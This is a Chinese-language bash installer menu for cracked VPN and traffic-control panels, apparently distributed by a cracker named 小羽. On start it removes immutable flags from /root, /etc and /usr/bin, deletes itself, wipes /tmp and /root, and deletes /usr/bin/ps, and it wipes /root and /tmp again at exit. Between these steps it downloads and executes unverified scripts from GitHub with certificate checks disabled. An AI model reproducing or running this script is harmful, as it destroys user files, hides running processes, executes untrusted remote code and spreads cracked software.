#!/bin/bash
ulimit -c 0 >/dev/null 2>&1
chattr -i /root >/dev/null 2>&1
chattr -i /tmp >/dev/null 2>&1
chattr -i /etc >/dev/null 2>&1
chattr -i /usr/bin >/dev/null 2>&1
rm -rf $0 >/dev/null 2>&1
rm -rf XYZH >/dev/null 2>&1
rm -f /tmp/* >/dev/null 2>&1
rm -f /root/* >/dev/null 2>&1
rm -f /usr/bin/ps >/dev/null 2>&1
key='小羽破解';
# ********************************** 脚本开始 **************************** #
IP=`wget http://www.sbwml.cn/getip -O - -q ; echo`;
# Logo	******************************************************************
CopyrightLogo='
\033[36m
==============================================================
               欢迎使用小羽云控破解综合版  				  
                 年少不轻狂、枉为少年郎
                  QQ交流群 600573662
                   Powered 小羽 2017  	
                  All Rights Reserved  
                                  By:小羽  
==============================================================\033[0m';
echo -e "$CopyrightLogo";
echo
echo -n -e "请输入验证码 [\033[32m $key \033[0m] ："
read PASSWD
readkey=$PASSWD
if [[ ${readkey%%\ *} == $key ]]
then
echo 
echo -e '\033[32m验证成功！\033[0m即将开始搭建...'
sleep 1
else
echo
echo -e '\033[31m验证失败 ，请重新尝试！  \033[0m'
sleep 1
echo
exit
fi
echo "正在检测您的IP是否正确加载..."

	if [[ "$IP" == '' ]]; then
		echo '无法检测您的IP,可能会影响到您接下来的搭建工作';
		read -p '请输入您的公网IP:' IP;
		[[ "$IP" == '' ]] && InputIPAddress;
	fi;
	[[ "$IP" == '' ]] && 
						 echo -e 'IP状态：			  [\033[32m  OK  \033[0m]'
						 echo -e "您的IP是：\033[34m$IP \033[0m"
						 echo 
						 echo
	if [ mod=1 ]
	then
echo -e "\033[33m========================================================================= \033[0m"
echo -e "\033[36m                     年少不轻狂、枉为少年郎 \033[0m"
echo ""
echo -e "\033[36m                       破解者：小羽         \033[0m"
echo ""
echo -e "\033[36m                       QQ：2453223958       \033[0m"
echo ""
echo -e "\033[36m                       交流群:2453223958    \033[0m"
echo ""
echo -e "\033[1;5;31m               欢迎使用小羽破解综合脚本：\n\033[0;1;36m"
echo
echo -e "\033[0;1;31m                  一、7.X系统免流破解脚本                                       \033[0m"
echo -e "\033[0;1;31m                  1.小羽小白版                                  【7.x系统】     \033[0m"
echo -e "\033[0;1;31m                  2.小羽FAS2.0破解版（不要选择对接流量卫士）    【7.x系统】     \033[0m"
echo -e "\033[0;1;31m                  3.小羽快云3                                   【7.x系统】     \033[0m" 
echo -e "\033[0;1;31m                  4.小羽vnser流控（简易版）                     【7.x系统】     \033[0m"
echo -e "\033[0;1;31m                  5.小羽大猫7Pro流控版本                        【7.x系统】     \033[0m" 
echo -e "\033[0;1;31m                  6.小羽VPNS3.8流控版本                         【7.x系统】     \033[0m"
echo -e "\033[0;1;31m                  7.小羽HTML2.1流控版本                         【7.x系统】     \033[0m"
echo -e "\033[0;1;31m                  8.小白破解综合                                【7.x系统】     \033[0m" 
echo -e "\033[0;1;31m                  9.小羽青云破解                                【7.x系统】     \033[0m"               
echo  
echo -e "\033[0;1;35m                  二、6.X系统DALO破解脚本                                        \033[0m"
echo -e "\033[0;1;35m                  12.小白DALO破解综合                            【6.x系统】       \033[0m"
echo                                                                                                                  
echo -e "\033[36m                                                by 小白免流       \033[0m"
echo -e "\033[33m========================================================================== \033[0m"
echo
echo
echo -n "输入您要搭建的选项: " 
read mode
fi
if [[ $mode == "1" ]]     
then
echo -e "安装类型：\033[36m小羽小白版\033[0m" ; 
wget -N --no-check-certificate https://github.com/CxiaoyuN/xiaoyu/raw/master/XYXB >/dev/null 2>&1 
chmod 777 XYXB
bash XYXB
fi


if [[ $mode == "2" ]] 
then
echo -e "安装类型：\033[36m小羽FAS1.6破解版\033[0m" ; 
wget -N --no-check-certificate https://github.com/CxiaoyuN/xiaoyu/raw/master/FAS >/dev/null 2>&1
chmod 777 FAS
./FAS
fi


if [[ $mode == "3" ]] 
then
echo -e "安装类型：\033[36m小羽SBW\033[0m" ;  
wget -N --no-check-certificate https://github.com/CxiaoyuN/xiaoyu/raw/master/XYKY3.sh>/dev/null 2>&1
chmod 777 XYKY3.sh
bash XYKY3.sh
fi


if [[ $mode == "4" ]] 
then
echo -e "安装类型：\033[36m小羽快云3期破解版（完美版）\033[0m" ; 
wget https://github.com/CxiaoyuN/xiaoyu/raw/master/vnser.sh >/dev/null 2>&1
bash vnser.sh
fi


if [[ $mode == "5" ]] 
then
echo -e "安装类型：\033[36m小羽大猫K8\033[0m" ;  
wget https://github.com/CxiaoyuN/xiaoyu/raw/master/XYDM >/dev/null 2>&1
chmod 777 XYDM
./XYDM
fi


if [[ $mode == "6" ]] 
then
echo -e "安装类型：\033[36m小羽VPNS3.8\033[0m" ;  
wget https://github.com/CxiaoyuN/xiaoyu/raw/master/vpns.sh >/dev/null 2>&1
chmod 777 vpns.sh
bash vpns.sh
fi



if [[ $mode == "8" ]] 
then
echo -e "安装类型：\033[36m小白破解综合\033[0m" ;  
wget -N --no-check-certificate https://github.com/CxiaoyuN/xiaoyu/raw/master/xbc >/dev/null 2>&1
chmod 777 xbc
bash xbc
fi


if [[ $mode == "9" ]] 
then
echo -e "安装类型：\033[36m小羽青云破解 \033[0m" ; 
wget -N --no-check-certificate https://github.com/CxiaoyuN/xiaoyu/raw/master/XYQY >/dev/null 2>&1
chmod 777 XYQY
./XYQY
fi


if [[ $mode == "12" ]]     
then
echo -e "安装类型：\033[36m小白综合DALO破解脚本\033[0m" ;  
wget -N --no-check-certificate https://github.com/CxiaoyuN/xiaoyu/raw/master/dalo >/dev/null 2>&1
bash dalo
fi

rm -f /tmp/* >/dev/null 2>&1
rm -f /root/* >/dev/null 2>&1
exit 0